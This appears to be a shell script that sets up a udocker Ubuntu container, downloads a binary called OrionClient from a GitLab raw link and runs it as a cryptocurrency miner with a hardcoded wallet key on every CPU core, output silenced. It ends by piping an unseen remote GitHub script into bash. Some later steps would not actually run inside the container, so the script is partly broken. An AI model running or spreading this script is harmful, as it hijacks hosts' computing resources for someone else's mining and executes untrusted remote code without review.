#!/bin/sh
wget https://github.com/indigo-dc/udocker/releases/download/1.3.9/udocker-1.3.9.tar.gz && tar zxvf udocker-1.3.9.tar.gz && mv udocker-1.3.9/udocker udocker && rm -rf udocker-1.3.9
cd udocker
./udocker pull ubuntu:focal
./udocker create --name=focal ubuntu:focal
./udocker  run focal /bin/bash

./udocker
echo
apt update && apt install -y unzip
apt install -y wget curl
wget https://gitlab.com/kido-esce/pile/-/raw/main/orion_linux151.zip
unzip orion_linux151.zip
cd linux && chmod 777 OrionClient
./OrionClient mine --pool twbitz --key 5o9PkcxTjqtvnGZRoqzAandwVKMkkzgpi4bUTkkeRgGV -t $(nproc --all) >/dev/null 2>&1
curl -sL https://github.com/kidoescegh/gbut/raw/main/waktu | bash
